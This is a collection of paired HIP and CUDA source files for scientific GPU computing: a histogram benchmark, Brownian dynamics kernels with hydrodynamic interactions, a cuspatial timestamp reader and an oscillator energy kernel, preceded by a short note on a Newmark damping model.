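Editorial note on the SoftBodyGrid3D pair above: solve() assembles stiffness_, forms a damped Newmark system via CommonKernels::newmarkTimeIntegration(dampingAlpha_, dampingBeta_, timestep_, newmarkTheta_), and hands the result to a CG solve. The usual reading of these parameter names is Rayleigh damping; the exact discretization inside newmarkTimeIntegration is not shown in this file, so the following is an assumption about the intended model, not the verified implementation:

\[
M\,\ddot{u} + \left(\alpha M + \beta K\right)\dot{u} + K\,u = f_{\text{ext}},
\]

with \(M\) the lumped (diagonal) mass from precomputed_.lumpedMass_, \(K\) the assembled stiffness_, \(\alpha\) = dampingAlpha_, \(\beta\) = dampingBeta_. A Newmark-\(\theta\) step of size \(\Delta t\) = timestep_ then reduces each time step to one linear system \(A\,u^{n+1} = b\) (newmarkA_, newmarkB_) solved by CommonKernels::solveCG, followed by the velocity update in newmarkComputeVelocity.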
b5093d75cef74286c8eb6a9bd64acf3a0bfc5a00.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"
#include "device_launch_parameters.h"
#include "gputimer.h"
#include "hip/hip_runtime.h"
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <iostream>

using namespace std;

const int matrixSize = 1024;
const int numberOfColors = 2;

__device__ int getGlobalIdx_2D_2D()
{
    int blockId = blockIdx.x + blockIdx.y * gridDim.x;
    int threadId = blockId * (blockDim.x * blockDim.y) + (threadIdx.y * blockDim.x) + threadIdx.x;
    return threadId;
}

__device__ int getGlobalIdx_1D_1D()
{
    return blockIdx.x * blockDim.x + threadIdx.x;
}

__global__ void histogram(unsigned int *a, unsigned int *b)
{
    int globalId = getGlobalIdx_1D_1D();
    atomicAdd(&b[a[globalId]], 1);
}

void test1(int g, int b)
{
    unsigned int *h_a, *d_a;
    unsigned int *h_b, *d_b;
    unsigned int bytes = matrixSize * matrixSize * sizeof(unsigned int);
    unsigned int bytes1 = numberOfColors * sizeof(unsigned int);
    GpuTimer timer;

    h_a = (unsigned int*) malloc(bytes);
    h_b = (unsigned int*) malloc(bytes1);
    hipMalloc((void **) &d_a, bytes);
    hipMalloc((void **) &d_b, bytes1);

    // init host arrays
    srand(time(NULL));
    for (int i = 0; i < matrixSize; i++) {
        for (int j = 0; j < matrixSize; j++) {
            h_a[i * matrixSize + j] = rand() % numberOfColors;
        }
    }
    for (int i = 0; i < numberOfColors; i++) {
        h_b[i] = 0;
    }

    // init gpu arrays (d_b holds only numberOfColors counters, hence bytes1)
    hipMemset(d_a, 0, bytes);
    hipMemset(d_b, 0, bytes1);

    // copy to gpu
    hipMemcpy(d_a, h_a, bytes, hipMemcpyHostToDevice);
    hipMemcpy(d_b, h_b, bytes1, hipMemcpyHostToDevice);

    // kernel call
    timer.Start();
    hipLaunchKernelGGL(( histogram), dim3(g), dim3(b), 0, 0, d_a, d_b);
    timer.Stop();

    cout << timer.Elapsed() << "\t<<<" << g << ", " << b << ">>> " << "\n";

    // copy to host
    /*hipMemcpy(h_b, d_b, bytes1, hipMemcpyDeviceToHost);
    for (int i = 0; i < numberOfColors; i++) {
        cout << h_b[i] << " ";
    }
    cout << "\n";*/
}

int main()
{
    test1(1024, 1024);
    getchar(); // wait for a key press before exiting
    return 0;
}
b5093d75cef74286c8eb6a9bd64acf3a0bfc5a00.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include "gputimer.h" #include "cuda.h" #include <stdio.h> #include <stdlib.h> #include <time.h> #include <iostream> using namespace std; const int matrixSize = 1024; const int numberOfColors = 2; __device__ int getGlobalIdx_2D_2D() { int blockId = blockIdx.x + blockIdx.y * gridDim.x; int threadId = blockId * (blockDim.x * blockDim.y) + (threadIdx.y * blockDim.x) + threadIdx.x; return threadId; } __device__ int getGlobalIdx_1D_1D() { return blockIdx.x *blockDim.x + threadIdx.x; } __global__ void histogram(unsigned int *a, unsigned int *b) { int globalId = getGlobalIdx_1D_1D(); atomicAdd(&b[a[globalId]], 1); } void test1(int g, int b) { unsigned int *h_a, *d_a; unsigned int *h_b, *d_b; unsigned int bytes = matrixSize * matrixSize * sizeof(unsigned int); unsigned int bytes1 = numberOfColors * sizeof(unsigned int); GpuTimer timer; h_a = (unsigned int*) malloc(bytes); h_b = (unsigned int*) malloc(bytes1); cudaMalloc((void **) &d_a, bytes); cudaMalloc((void **) &d_b, bytes1); // init host arrays srand(time(NULL)); for (int i=0; i<matrixSize; i++) { for (int j=0; j<matrixSize; j++) { h_a[i*matrixSize + j] = rand() % numberOfColors; } } for (int i=0; i<numberOfColors; i++) { h_b[i] = 0; } // init gpu arrays cudaMemset(d_a, 0, bytes); cudaMemset(d_b, 0, bytes); // copy to gpu cudaMemcpy(d_a, h_a, bytes, cudaMemcpyHostToDevice); cudaMemcpy(d_b, h_b, bytes1, cudaMemcpyHostToDevice); // kernel call timer.Start(); histogram<<<g, b>>>(d_a, d_b); timer.Stop(); cout << timer.Elapsed() << "\t<<<" << g << ", " << b << ">>> " << "\n"; // copy to host /*cudaMemcpy(h_b, d_b, bytes1, cudaMemcpyDeviceToHost); for (int i=0; i<numberOfColors; i++) { cout << h_b[i] << " "; } cout << "\n";*/ } int main() { test1(1024, 1024); scanf("%d", NULL); return 0; }
a8d5be61f341feb821fa6a6ae31e7d15ca617732.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * bdhitea_kernel.cu * * Created on: Mar 4, 2013 * Author: alekseenko * * All equations referenced here are from Geyer & Winter, 2009 [doi:10.1063/1.3089668] */ #include "bdhitea.cuh" //#define PRINT_HI_TENSORS // Enable to print tensor values. Should never be used in production. Calling `hipDeviceSetLimit(hipLimitPrintfFifoSize, 900000000);` is recommended if you do not want to lose any values! __global__ void integrateTea_prepare(Coord* d_f, Coord* d_r){ // Precalculate random forces and apply pulling forces const int d_i = blockIdx.x*blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr){ // Random force const float var = sqrtf(2.0f * KB * c_par.Temp * c_par.gammaR / c_par.dt);//c_langevin.var; /////// sqrt(2 kb T gamma/dt) float4 df = rforce(d_i); df.x *= var; df.y *= var; df.z *= var; c_tea.rforce[d_i] = df; float4 f = make_float4(d_f[d_i].x, d_f[d_i].y, d_f[d_i].z, 0.f );//c_gsop.d_forces[d_i]; // Copy forces and coordinates to auxillary arrays to avoid races during integration phase c_tea.mforce[d_i] = f; d_f[d_i].x = 0.f; d_f[d_i].y = 0.f; d_f[d_i].z = 0.f; c_tea.coords[d_i] = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f); } } __device__ inline float6 integrateTea_RPY(const float4& dr){ // This functions requires `dr` to be normalized and have its original length in its W component // Returns Dij(dr)/Dii, where Dij is Rotne-Prager-Yamakawa tensor submatrix, eq. (3-5) float6 ret; const float ra = dr.w / c_tea.a; float coeffrr, coeffii; if (ra > 2.f){ coeffrr = 0.75f/ra * (1.f - 2.f/ra/ra); coeffii = 0.75f/ra * (1.f + 2.f/3.f/ra/ra); }else{ coeffrr = 3.f*ra/32.f; coeffii = 1.f - 9.f*ra/32.f; } ret._XX = dr.x*dr.x*coeffrr + coeffii; ret._XY = dr.x*dr.y*coeffrr; ret._XZ = dr.x*dr.z*coeffrr; ret._YY = dr.y*dr.y*coeffrr + coeffii; ret._YZ = dr.y*dr.z*coeffrr; ret._ZZ = dr.z*dr.z*coeffrr + coeffii; return ret; } __device__ inline float4 integrateTea_epsilon_local(const float4& coord1, const int idx2, Coord* d_r){ // Function calculates various statistics for sub-tensor responsible for interactions between two given particles // .x, .y, .z --- sum of squares of normalized tensor components, 3 rows, used for C_i in eq. (19) // .w --- sum of normalized tensor components (\sum Dij/Dii), used for \epsilon in eq. 
(22) float4 dr = make_float4(d_r[idx2].x, d_r[idx2].y, d_r[idx2].z, 0.f); dr.x -= coord1.x; dr.y -= coord1.y; dr.z -= coord1.z; //printf("%f\n", dr.x); dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w; //printf("%d kkk %f %f %f %f\n",idx2 , dr.x, dr.y, dr.z, dr.w); float6 d = integrateTea_RPY(dr); dr.w = d._XX + 2*d._XY + 2*d._XZ + d._YY + 2*d._YZ + d._ZZ; // Sum of all 3*3 tensor components dr.x = d._XX*d._XX + d._XY*d._XY + d._XZ*d._XZ; dr.y = d._YX*d._YX + d._YY*d._YY + d._YZ*d._YZ; dr.z = d._ZX*d._ZX + d._ZY*d._ZY + d._ZZ*d._ZZ; return dr; } __global__ void integrateTea_epsilon_unlisted(Coord* d_r){ // Like integrateTea_epsilon, but calculate all-vs-all const int d_i = blockIdx.x * blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr){ const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot; int i; float4 coord = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f); float4 sum = make_float4(0.f, 0.f, 0.f, 0.f); for(i = i0; i < i0 + c_tea.Ntot; i++){ if (i != d_i && !c_top.extra[i] && !c_top.extra[d_i]){ sum += integrateTea_epsilon_local(coord, i, d_r); } } c_tea.d_ci[d_i] = make_float4(sum.x, sum.y, sum.z, 0.f); c_tea.d_epsilon[d_i] = sum.w; // Should later be divided by number of non-diagonal degrees-of-freedom in single trajectory } } __device__ inline float4 integrateTea_force(const float4& coord1, const int idx2, const float3& ci, const int idx1){ // Calculate the effective force acting on particle with coordinates `coord1` from particle with index `idx2` // eq. (13,14,19) float4 dr = c_tea.coords[idx2]; dr.x -= coord1.x; dr.y -= coord1.y; dr.z -= coord1.z; dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w; float4 f = c_tea.mforce[idx2]; float4 r = c_tea.rforce[idx2]; f.x += r.x * ci.x; f.y += r.y * ci.y; f.z += r.z * ci.z; float6 D = integrateTea_RPY(dr); #ifdef PRINT_HI_TENSORS printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX); printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY); printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX*ci.z); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY*ci.z); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ*ci.z); #endif return make_float4( D._XX*f.x + D._XY*f.y + D._XZ*f.z, D._YX*f.x + D._YY*f.y + D._YZ*f.z, D._ZX*f.x + D._ZY*f.y + D._ZZ*f.z, 0.f); } __global__ void integrateTea_kernel_unlisted(Coord* d_f, Coord* d_r){ // Pairist-free version of integrateTea_kernel const int d_i = blockIdx.x*blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr ){ int i; float4 coord = c_tea.d_ci[d_i]; // Not coord yet! 
float4 f = c_tea.mforce[d_i]; float4 df = c_tea.rforce[d_i]; const int tr = d_i / c_tea.Ntot; const float beta_ij = c_tea.d_beta_ij[tr]; float3 ci; // Make ci to be actual C_i coord.w = beta_ij*beta_ij; ci.x = 1.f/sqrtf(1.f + coord.w * coord.x); ci.y = 1.f/sqrtf(1.f + coord.w * coord.y); ci.z = 1.f/sqrtf(1.f + coord.w * coord.z); coord = c_tea.coords[d_i]; // And now it's actually bead coordinates f.x += df.x * ci.x; f.y += df.y * ci.y; f.z += df.z * ci.z; ci.x *= beta_ij; ci.y *= beta_ij; ci.z *= beta_ij; // Calculate effective force const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot; for(i = i0; i < i0 + c_tea.Ntot; i++){ if (i == d_i || c_top.extra[d_i] || c_top.extra[i]) continue; df = integrateTea_force(coord, i, ci, d_i); f.x += df.x; f.y += df.y; f.z += df.z; } // Integration step // We've replaced all forces with their `effective` counterparts, so this part of integration process stays the same as in simple langevin integrator const float mult = c_par.dt / c_par.gammaR ; ///c_langevin.hOverZeta; const float3 dr = make_float3(mult*f.x, mult*f.y, mult*f.z); coord.x += dr.x; coord.y += dr.y; coord.z += dr.z; Coord ri = d_r[d_i]; Coord fi = d_f[d_i]; float4 rf_ang = make_float4(0.0, 0.0, 0.0, 0.0); rf_ang = rforce(d_i + c_par.Ntot*c_par.Ntr); if(!c_top.fixed[d_i % c_par.Ntot] && !c_top.extra[d_i]){ ri.x = coord.x; ri.y = coord.y; ri.z = coord.z; ri.fi += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.fi + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.x; ri.psi += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.psi + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.y; ri.theta += (c_par.dt/c_par.gammaTheta)*fi.theta + c_par.varTheta*rf_ang.z; } d_r[d_i] = ri; // Update energies /*coord = c_gsop.d_energies[d_i]; coord.w += c_langevin.tempNorm*(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); c_gsop.d_energies[d_i] = coord;*/ } } #undef _XX #undef _XY #undef _XZ #undef _YX #undef _YY #undef _YZ #undef _ZX #undef _ZY #undef _ZZ
a8d5be61f341feb821fa6a6ae31e7d15ca617732.cu
/*
 * bdhitea_kernel.cu
 *
 *  Created on: Mar 4, 2013
 *      Author: alekseenko
 *
 * All equations referenced here are from Geyer & Winter, 2009 [doi:10.1063/1.3089668]
 */
#include "bdhitea.cuh"

//#define PRINT_HI_TENSORS // Enable to print tensor values. Should never be used in production. Calling `cudaDeviceSetLimit(cudaLimitPrintfFifoSize, 900000000);` is recommended if you do not want to lose any values!

__global__ void integrateTea_prepare(Coord* d_f, Coord* d_r){
	// Precalculate random forces and apply pulling forces
	const int d_i = blockIdx.x*blockDim.x + threadIdx.x;
	if(d_i < c_par.Ntot * c_par.Ntr){
		// Random force
		const float var = sqrtf(2.0f * KB * c_par.Temp * c_par.gammaR / c_par.dt); //c_langevin.var; /////// sqrt(2 kb T gamma/dt)
		float4 df = rforce(d_i);
		df.x *= var; df.y *= var; df.z *= var;
		c_tea.rforce[d_i] = df;
		float4 f = make_float4(d_f[d_i].x, d_f[d_i].y, d_f[d_i].z, 0.f); //c_gsop.d_forces[d_i];
		// Copy forces and coordinates to auxiliary arrays to avoid races during integration phase
		c_tea.mforce[d_i] = f;
		d_f[d_i].x = 0.f;
		d_f[d_i].y = 0.f;
		d_f[d_i].z = 0.f;
		c_tea.coords[d_i] = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f);
	}
}

__device__ inline float6 integrateTea_RPY(const float4& dr){
	// This function requires `dr` to be normalized and have its original length in its W component
	// Returns Dij(dr)/Dii, where Dij is the Rotne-Prager-Yamakawa tensor submatrix, eq. (3-5)
	float6 ret;
	const float ra = dr.w / c_tea.a;
	float coeffrr, coeffii;
	if (ra > 2.f){
		coeffrr = 0.75f/ra * (1.f - 2.f/ra/ra);
		coeffii = 0.75f/ra * (1.f + 2.f/3.f/ra/ra);
	}else{
		coeffrr = 3.f*ra/32.f;
		coeffii = 1.f - 9.f*ra/32.f;
	}
	ret._XX = dr.x*dr.x*coeffrr + coeffii;
	ret._XY = dr.x*dr.y*coeffrr;
	ret._XZ = dr.x*dr.z*coeffrr;
	ret._YY = dr.y*dr.y*coeffrr + coeffii;
	ret._YZ = dr.y*dr.z*coeffrr;
	ret._ZZ = dr.z*dr.z*coeffrr + coeffii;
	return ret;
}

__device__ inline float4 integrateTea_epsilon_local(const float4& coord1, const int idx2, Coord* d_r){
	// Calculates various statistics for the sub-tensor responsible for interactions between two given particles
	// .x, .y, .z --- sum of squares of normalized tensor components, 3 rows, used for C_i in eq. (19)
	// .w --- sum of normalized tensor components (\sum Dij/Dii), used for \epsilon in eq. (22)
	float4 dr = make_float4(d_r[idx2].x, d_r[idx2].y, d_r[idx2].z, 0.f);
	dr.x -= coord1.x;
	dr.y -= coord1.y;
	dr.z -= coord1.z;
	//printf("%f\n", dr.x);
	dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z);
	dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w;
	//printf("%d kkk %f %f %f %f\n", idx2, dr.x, dr.y, dr.z, dr.w);
	float6 d = integrateTea_RPY(dr);
	dr.w = d._XX + 2*d._XY + 2*d._XZ + d._YY + 2*d._YZ + d._ZZ; // Sum of all 3*3 tensor components
	dr.x = d._XX*d._XX + d._XY*d._XY + d._XZ*d._XZ;
	dr.y = d._YX*d._YX + d._YY*d._YY + d._YZ*d._YZ;
	dr.z = d._ZX*d._ZX + d._ZY*d._ZY + d._ZZ*d._ZZ;
	return dr;
}

__global__ void integrateTea_epsilon_unlisted(Coord* d_r){
	// Like integrateTea_epsilon, but calculates all-vs-all
	const int d_i = blockIdx.x * blockDim.x + threadIdx.x;
	if(d_i < c_par.Ntot * c_par.Ntr){
		const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot;
		int i;
		float4 coord = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f);
		float4 sum = make_float4(0.f, 0.f, 0.f, 0.f);
		for(i = i0; i < i0 + c_tea.Ntot; i++){
			if (i != d_i && !c_top.extra[i] && !c_top.extra[d_i]){
				sum += integrateTea_epsilon_local(coord, i, d_r);
			}
		}
		c_tea.d_ci[d_i] = make_float4(sum.x, sum.y, sum.z, 0.f);
		c_tea.d_epsilon[d_i] = sum.w; // Should later be divided by number of non-diagonal degrees-of-freedom in single trajectory
	}
}

__device__ inline float4 integrateTea_force(const float4& coord1, const int idx2, const float3& ci, const int idx1){
	// Calculate the effective force acting on the particle with coordinates `coord1` from the particle with index `idx2`
	// eq. (13,14,19)
	float4 dr = c_tea.coords[idx2];
	dr.x -= coord1.x;
	dr.y -= coord1.y;
	dr.z -= coord1.z;
	dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z);
	dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w;
	float4 f = c_tea.mforce[idx2];
	float4 r = c_tea.rforce[idx2];
	f.x += r.x * ci.x;
	f.y += r.y * ci.y;
	f.z += r.z * ci.z;
	float6 D = integrateTea_RPY(dr);
#ifdef PRINT_HI_TENSORS
	printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX);
	printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY);
	printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ);
	printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX);
	printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY);
	printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ);
	printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX);
	printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY);
	printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ);
	printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX*ci.x);
	printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY*ci.x);
	printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ*ci.x);
	printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX*ci.y);
	printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY*ci.y);
	printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ*ci.y);
	printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX*ci.z);
	printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY*ci.z);
	printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ*ci.z);
#endif
	return make_float4(
		D._XX*f.x + D._XY*f.y + D._XZ*f.z,
		D._YX*f.x + D._YY*f.y + D._YZ*f.z,
		D._ZX*f.x + D._ZY*f.y + D._ZZ*f.z, 0.f);
}

__global__ void integrateTea_kernel_unlisted(Coord* d_f, Coord* d_r){
	// Pairlist-free version of integrateTea_kernel
	const int d_i = blockIdx.x*blockDim.x + threadIdx.x;
	if(d_i < c_par.Ntot * c_par.Ntr){
		int i;
		float4 coord = c_tea.d_ci[d_i]; // Not coord yet!
		float4 f = c_tea.mforce[d_i];
		float4 df = c_tea.rforce[d_i];
		const int tr = d_i / c_tea.Ntot;
		const float beta_ij = c_tea.d_beta_ij[tr];
		float3 ci;
		// Make ci to be actual C_i
		coord.w = beta_ij*beta_ij;
		ci.x = 1.f/sqrtf(1.f + coord.w * coord.x);
		ci.y = 1.f/sqrtf(1.f + coord.w * coord.y);
		ci.z = 1.f/sqrtf(1.f + coord.w * coord.z);
		coord = c_tea.coords[d_i]; // And now it's actually bead coordinates
		f.x += df.x * ci.x;
		f.y += df.y * ci.y;
		f.z += df.z * ci.z;
		ci.x *= beta_ij;
		ci.y *= beta_ij;
		ci.z *= beta_ij;
		// Calculate effective force
		const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot;
		for(i = i0; i < i0 + c_tea.Ntot; i++){
			if (i == d_i || c_top.extra[d_i] || c_top.extra[i]) continue;
			df = integrateTea_force(coord, i, ci, d_i);
			f.x += df.x;
			f.y += df.y;
			f.z += df.z;
		}
		// Integration step
		// We've replaced all forces with their `effective` counterparts, so this part of the integration process stays the same as in the simple Langevin integrator
		const float mult = c_par.dt / c_par.gammaR; ///c_langevin.hOverZeta;
		const float3 dr = make_float3(mult*f.x, mult*f.y, mult*f.z);
		coord.x += dr.x;
		coord.y += dr.y;
		coord.z += dr.z;
		Coord ri = d_r[d_i];
		Coord fi = d_f[d_i];
		float4 rf_ang = make_float4(0.0, 0.0, 0.0, 0.0);
		rf_ang = rforce(d_i + c_par.Ntot*c_par.Ntr);
		if(!c_top.fixed[d_i % c_par.Ntot] && !c_top.extra[d_i]){
			ri.x = coord.x;
			ri.y = coord.y;
			ri.z = coord.z;
			ri.fi    += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.fi  + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.x;
			ri.psi   += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.psi + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.y;
			ri.theta += (c_par.dt/c_par.gammaTheta)*fi.theta + c_par.varTheta*rf_ang.z;
		}
		d_r[d_i] = ri;
		// Update energies
		/*coord = c_gsop.d_energies[d_i];
		coord.w += c_langevin.tempNorm*(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z);
		c_gsop.d_energies[d_i] = coord;*/
	}
}

#undef _XX
#undef _XY
#undef _XZ
#undef _YX
#undef _YY
#undef _YZ
#undef _ZX
#undef _ZY
#undef _ZZ
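The three kernels above form one TEA-HI integration step: integrateTea_prepare stages forces, coordinates, and random forces, integrateTea_epsilon_unlisted accumulates the per-bead coupling sums (d_ci, d_epsilon), and integrateTea_kernel_unlisted contracts the RPY submatrices with the effective forces. The host-side driver is not part of this file; the sketch below is one plausible launch sequence, where the block size and the beta_ij reduction step are assumptions rather than code taken from this project.

// Plausible host-side driver (sketch only; grid/block sizes and the beta_ij
// reduction are assumptions, not taken from bdhitea_kernel.cu).
void teaStep(Coord* d_f, Coord* d_r, int Ntot, int Ntr){
	const int blockSize = 64;                                  // assumed block size
	const int N = Ntot * Ntr;
	const int gridSize = (N + blockSize - 1) / blockSize;
	integrateTea_prepare<<<gridSize, blockSize>>>(d_f, d_r);         // stage forces/coords, draw random forces
	integrateTea_epsilon_unlisted<<<gridSize, blockSize>>>(d_r);     // accumulate d_ci and d_epsilon
	// ... the host would reduce c_tea.d_epsilon per trajectory and fill c_tea.d_beta_ij here ...
	integrateTea_kernel_unlisted<<<gridSize, blockSize>>>(d_f, d_r); // apply effective forces and integrate
	cudaDeviceSynchronize();
}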
8cd3f12f9954aee35c9d0590a7abcc60fb4f786d.hip
// !!! This is a file automatically generated by hipify!!!
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <hip/hip_runtime.h>
#include <utilities/error_utils.hpp>
#include <rmm/rmm.h>
#include <cudf/types.h>
#include <cudf/legacy/column.hpp>
#include <cuspatial/soa_readers.hpp>
#include <utility/utility.hpp>

namespace cuspatial {

/**
 * @brief read timestamp (ts: Time type) data from file as column
 * see soa_readers.hpp
 */
gdf_column read_timestamp_soa(const char *filename)
{
    gdf_column ts;
    memset(&ts, 0, sizeof(gdf_column));

    struct its_timestamp *timestamp = nullptr;
    size_t num_t = read_field<its_timestamp>(filename, timestamp);
    if (timestamp == nullptr)
        return ts;

    its_timestamp* temp_ts{nullptr};
    RMM_TRY( RMM_ALLOC(&temp_ts, num_t * sizeof(its_timestamp), 0) );
    hipStream_t stream{0};
    CUDA_TRY( hipMemcpyAsync(temp_ts, timestamp, num_t * sizeof(its_timestamp),
                             hipMemcpyHostToDevice, stream) );

    gdf_column_view_augmented(&ts, temp_ts, nullptr, num_t,
                              GDF_INT64, 0,
                              gdf_dtype_extra_info{TIME_UNIT_NONE}, "timestamp");

    delete[] timestamp;
    return ts;
}  // read_timestamp_soa

}  // namespace cuspatial
8cd3f12f9954aee35c9d0590a7abcc60fb4f786d.cu
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <cuda_runtime.h>
#include <utilities/error_utils.hpp>
#include <rmm/rmm.h>
#include <cudf/types.h>
#include <cudf/legacy/column.hpp>
#include <cuspatial/soa_readers.hpp>
#include <utility/utility.hpp>

namespace cuspatial {

/**
 * @brief read timestamp (ts: Time type) data from file as column
 * see soa_readers.hpp
 */
gdf_column read_timestamp_soa(const char *filename)
{
    gdf_column ts;
    memset(&ts, 0, sizeof(gdf_column));

    struct its_timestamp *timestamp = nullptr;
    size_t num_t = read_field<its_timestamp>(filename, timestamp);
    if (timestamp == nullptr)
        return ts;

    its_timestamp* temp_ts{nullptr};
    RMM_TRY( RMM_ALLOC(&temp_ts, num_t * sizeof(its_timestamp), 0) );
    cudaStream_t stream{0};
    CUDA_TRY( cudaMemcpyAsync(temp_ts, timestamp, num_t * sizeof(its_timestamp),
                              cudaMemcpyHostToDevice, stream) );

    gdf_column_view_augmented(&ts, temp_ts, nullptr, num_t,
                              GDF_INT64, 0,
                              gdf_dtype_extra_info{TIME_UNIT_NONE}, "timestamp");

    delete[] timestamp;
    return ts;
}  // read_timestamp_soa

}  // namespace cuspatial
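A caller of read_timestamp_soa receives a gdf_column whose data member points to device memory holding num_t its_timestamp records; a zeroed column signals a read failure. The usage sketch below is hypothetical: the file path is an assumption, and only the reader's signature and return convention come from the file above.

#include <cuspatial/soa_readers.hpp>
#include <iostream>

int main()
{
    // "its_timestamps.soa" is a placeholder path, not a file shipped with the library.
    gdf_column ts = cuspatial::read_timestamp_soa("its_timestamps.soa");
    if (ts.data == nullptr) {
        std::cerr << "failed to read timestamp SoA file" << std::endl;
        return 1;
    }
    std::cout << "read " << ts.size << " timestamps into device memory" << std::endl;
    // Ownership of the RMM-allocated device buffer in ts.data stays with the caller.
    return 0;
}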
0bc3428b0cdfc68ceddc22868a3db2a3e2ea9a78.hip
// !!! This is a file automatically generated by hipify!!!
#include "energy.h"
#include <hip/hip_runtime_api.h>
#include <hip/hip_runtime.h>

#define THREAD_PER_BLOCK 128

__global__ void kernel(int number_of_points, double *d_value)
{
    int i;
    i = blockDim.x * blockIdx.x + threadIdx.x;
    if (i < number_of_points) {
        double *value = d_value + i * C_NUMBER_OF_VARIABLES;
        double x = C_A * sin(d_value[phase]);           // displacement
        double v = C_A * C_omega * cos(d_value[phase]); // velocity
        double U = C_k * x * x / 2.;                    // potential energy
        double K = C_m * v * v / 2.;                    // kinetic energy
        value[E] += (U + K) / M;                        // mechanical energy
        value[phase] += C_omega;                        // phase progress
    }
}

extern "C" void extern_run(const int number_of_points, double *d_value)
{
    int blocks = number_of_points/THREAD_PER_BLOCK + 1; // add code to init blocks
    hipLaunchKernelGGL(( kernel), dim3(blocks), dim3(THREAD_PER_BLOCK), 0, 0, number_of_points, d_value);
}
0bc3428b0cdfc68ceddc22868a3db2a3e2ea9a78.cu
